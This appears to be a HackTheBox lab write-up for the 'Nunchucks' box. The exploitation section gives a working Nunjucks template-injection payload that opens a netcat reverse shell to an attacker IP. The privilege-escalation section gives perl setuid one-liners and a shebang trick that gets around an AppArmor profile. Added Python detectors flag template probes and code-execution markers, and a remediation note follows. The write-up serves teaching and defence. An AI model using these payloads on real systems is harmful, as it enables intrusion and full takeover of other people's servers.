Nunchucks
An easy Linux box from HackTheBox: server-side template injection (SSTI) for initial access, then a quirk in how AppArmor confines perl to get root.
Recon
Running the usual nmap scan shows a website on port 80.
There is no way to sign up, despite there being a page for it.
gobuster doesn't return anything interesting either, even with the medium wordlist.
Try to enumerate subdomains with wfuzz, using --hh to hide responses with the default page's character count and putting FUZZ in the Host header to specify what is being fuzzed:
sudo wfuzz -H "Host: FUZZ.nunchucks.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 30587 https://nunchucks.htb
It finds the store subdomain. After adding it to the hosts file and navigating to it, the page looks like this:
When you submit an email address, the page reflects the input.
Trying template injection shows that it works: a 10x2 expression is evaluated.
Looking at the HTTP response in Burp identifies the technology: the X-Powered-By header shows the site uses Express (Node.js):
HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 May 2022 23:58:20 GMT
Connection: close
X-Powered-By: Express
ETag: W/"fbd-udK+KYlYFVN2Nn2DXdm1EXd8mv0"
Using the HackTricks template injection section to fingerprint it, a {{foo}} payload outputting nothing indicates the templating engine is Nunjucks (haha).
Exploitation
The injection can be used to execute system commands; this gets a reverse shell using the netcat binary on the system:
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 6767 >/tmp/f')\")()}}"}
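For the defending side of the same story, here is a small detector (added example, not part of the original writeup or the box) that classifies submitted form values the way the fingerprinting and exploitation steps above progress: a plain value, a template expression such as {{foo}}, an arithmetic probe such as {{7*7}} or {{10*2}}, and an expression reaching for code execution through the JavaScript object model. The sample requests, the field name and content types are constructed; the delimiter and marker lists are general template syntaxes, not something the page lists.

```python
import json
import re
from urllib.parse import parse_qs

# Delimiters of the template syntaxes a reflected value might be evaluated by:
# {{ }} / {% %} (Nunjucks, Jinja2, Twig), ${ } (Freemarker, JS), <% %> (EJS), #{ } (Pug).
TEMPLATE_EXPRESSION = re.compile(
    r"\{\{(.*?)\}\}|\{%(.*?)%\}|\$\{(.*?)\}|<%(.*?)%>|#\{(.*?)\}", re.S)
# Arithmetic such as 7*7 or 10*2: the classic "does it evaluate?" probe.
ARITHMETIC_PROBE = re.compile(r"^\s*\d+\s*[*+\-/]\s*\d+\s*$")
# Substrings that only show up when an expression reaches for code execution
# through the JavaScript object model (the sink used in the payload above).
CODE_EXEC_MARKERS = ("constructor(", "process.mainModule", "child_process",
                     "execSync", "require(")


def classify_value(value: str) -> str:
    """Return 'none', 'expression', 'probe' or 'exec' for one submitted field."""
    # findall returns one tuple per match with only the matching group filled in
    inners = ["".join(groups) for groups in TEMPLATE_EXPRESSION.findall(value)]
    if not inners:
        return "none"
    if any(marker in value for marker in CODE_EXEC_MARKERS):
        return "exec"
    if any(ARITHMETIC_PROBE.match(inner) for inner in inners):
        return "probe"
    return "expression"


def body_fields(content_type: str, body: str) -> dict:
    """Decode a JSON or form-encoded body into {field: [string values]}.
    Form bodies are percent-decoded, so %7B%7B7*7%7D%7D is seen as {{7*7}}."""
    if "json" in content_type:
        try:
            data = json.loads(body)
        except ValueError:
            return {}
        if not isinstance(data, dict):
            return {}
        return {key: [val] for key, val in data.items() if isinstance(val, str)}
    return parse_qs(body, keep_blank_values=True)


def scan_requests(requests: list) -> list:
    """Return (request index, field, classification) for every suspicious field."""
    findings = []
    for index, req in enumerate(requests):
        for field, values in body_fields(req["content_type"], req["body"]).items():
            for value in values:
                level = classify_value(value)
                if level != "none":
                    findings.append((index, field, level))
    return findings


# Constructed sample traffic to the store's e-mail form (not captured from the box).
SAMPLE_REQUESTS = [
    {"content_type": "application/json", "body": '{"email":"alice@example.com"}'},
    {"content_type": "application/json", "body": '{"email":"{{7*7}}"}'},
    {"content_type": "application/json", "body": '{"email":"{{foo}}"}'},
    {"content_type": "application/json",
     "body": '{"email":"{{range.constructor(\\"return 1\\")()}}"}'},
    {"content_type": "application/x-www-form-urlencoded",
     "body": "email=%7B%7B10*2%7D%7D"},
]

if __name__ == "__main__":
    for index, field, level in scan_requests(SAMPLE_REQUESTS):
        print(f"request {index}: field {field!r} -> {level}")
```

Run over the constructed sample, requests 1 and 4 come out as probes, 2 as a bare expression and 3 as an execution attempt. Logging-side detection like this is a fallback; the fix for the application is to pass the submitted e-mail into the template context as data rather than into the template source, so that nothing the user sends is ever parsed as template syntax.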
With the reverse shell, run linpeas; it finds that perl has the cap_setuid file capability:
/usr/bin/perl = cap_setuid+ep
So to exploit it, just call setuid(0) and exec a shell with a one-liner:
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
But it doesn't work, because perl is confined by the AppArmor profile in /etc/apparmor.d/usr.bin.perl, which protects the root directory. linpeas had found it, but I didn't see it and thought I was being a moron:
/usr/bin/perl {
#include <abstractions/base>
#include <abstractions/nameservice>
#include <abstractions/perl>
capability setuid,
deny owner /etc/nsswitch.conf r,
deny /root/* rwx,
deny /etc/shadow rwx,
/usr/bin/id mrix,
/usr/bin/ls mrix,
/usr/bin/cat mrix,
/usr/bin/whoami mrix,
/opt/backup.pl mrix,
owner /home/ r,
owner /home/david/ r,
}
However, there is a bypass: when perl is invoked via a shebang line in a script rather than directly, the profile doesn't restrict it, and you can spawn a shell:
#!/usr/bin/perl
use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";
Making it executable with chmod and running it then gives you root.
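To turn the privilege escalation above into an audit check, here is an added example (not part of the original writeup or the box) that parses getcap output to flag privileged file capabilities on interpreters, parses the AppArmor profile quoted above, and summarises what the two add up to. The perl line and the profile body are the ones from the writeup; the ping and python3 getcap lines are constructed for contrast, and the capability and interpreter lists are the author's own choice of what to flag.

```python
import re

# File capabilities that let a binary change identity or bypass DAC. Any of
# these on an interpreter hands a root-equivalent to whoever can run it.
PRIVILEGED_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
                   "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module"}
# Interpreters that run arbitrary code supplied by the invoking user.
INTERPRETERS = ("perl", "python", "ruby", "node", "php", "lua", "bash", "sh")

# Accepts both the older "path = caps" and the newer "path caps" getcap layouts.
GETCAP_LINE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>\S+)$")
CAP_NAME = re.compile(r"cap_[a-z_]+")
# One AppArmor file rule: [deny] [owner] /path perms,
PROFILE_RULE = re.compile(
    r"^(?P<deny>deny\s+)?(?P<owner>owner\s+)?(?P<path>/\S*)\s+(?P<perms>[a-zA-Z]+),$")


def parse_getcap(output: str) -> dict:
    """Map each path in `getcap -r /` output to the set of capability names on it."""
    caps_by_path = {}
    for line in output.splitlines():
        match = GETCAP_LINE.match(line.strip())
        if match:
            caps_by_path[match.group("path")] = set(CAP_NAME.findall(match.group("caps")))
    return caps_by_path


def risky_binaries(caps_by_path: dict) -> list:
    """(path, privileged caps, is_interpreter) for every binary worth a look."""
    findings = []
    for path, caps in sorted(caps_by_path.items()):
        hit = caps & PRIVILEGED_CAPS
        if hit:
            name = path.rsplit("/", 1)[-1]
            is_interpreter = any(name.startswith(prefix) for prefix in INTERPRETERS)
            findings.append((path, sorted(hit), is_interpreter))
    return findings


def parse_apparmor_profile(text: str) -> dict:
    """Pull the capability grants and the allow/deny file rules out of a profile."""
    profile = {"capabilities": set(), "allow": {}, "deny": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("capability ") and line.endswith(","):
            profile["capabilities"].add(line[len("capability "):-1].strip())
            continue
        match = PROFILE_RULE.match(line)
        if match:
            bucket = profile["deny"] if match.group("deny") else profile["allow"]
            bucket[match.group("path")] = match.group("perms")
    return profile


def assess(getcap_output: str, profile_text: str, binary: str) -> list:
    """Explain what the capability plus the profile add up to for one binary."""
    caps = parse_getcap(getcap_output).get(binary, set())
    profile = parse_apparmor_profile(profile_text)
    findings = []
    if "cap_setuid" in caps:
        findings.append(f"{binary} has cap_setuid: any local user can call setuid(0)")
        if "setuid" in profile["capabilities"]:
            findings.append("profile grants 'capability setuid', so confinement rests on file rules only")
    for path, perms in profile["deny"].items():
        findings.append(f"profile denies {path} ({perms})")
    return findings


# Constructed getcap output: the perl line is the one linpeas reported on the box,
# the other two are made up for contrast.
SAMPLE_GETCAP = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/opt/tools/python3 cap_setuid,cap_dac_override=ep
"""

# The profile body quoted above (/etc/apparmor.d/usr.bin.perl).
SAMPLE_PROFILE = """\
/usr/bin/perl {
  #include <abstractions/base>
  #include <abstractions/nameservice>
  #include <abstractions/perl>
  capability setuid,
  deny owner /etc/nsswitch.conf r,
  deny /root/* rwx,
  deny /etc/shadow rwx,
  /usr/bin/id mrix,
  /usr/bin/ls mrix,
  /usr/bin/cat mrix,
  /usr/bin/whoami mrix,
  /opt/backup.pl mrix,
  owner /home/ r,
  owner /home/david/ r,
}
"""

if __name__ == "__main__":
    for path, caps, is_interpreter in risky_binaries(parse_getcap(SAMPLE_GETCAP)):
        print(f"{path}: {', '.join(caps)}{' (interpreter)' if is_interpreter else ''}")
    for finding in assess(SAMPLE_GETCAP, SAMPLE_PROFILE, "/usr/bin/perl"):
        print(finding)
```

The assessment makes the point of the writeup explicit: the profile still grants capability setuid, so it only limits which files perl can touch, and the shebang behaviour described above means even those limits do not hold for a script. The remediation is therefore to remove the capability from the interpreter (setcap -r /usr/bin/perl) rather than to tighten the profile.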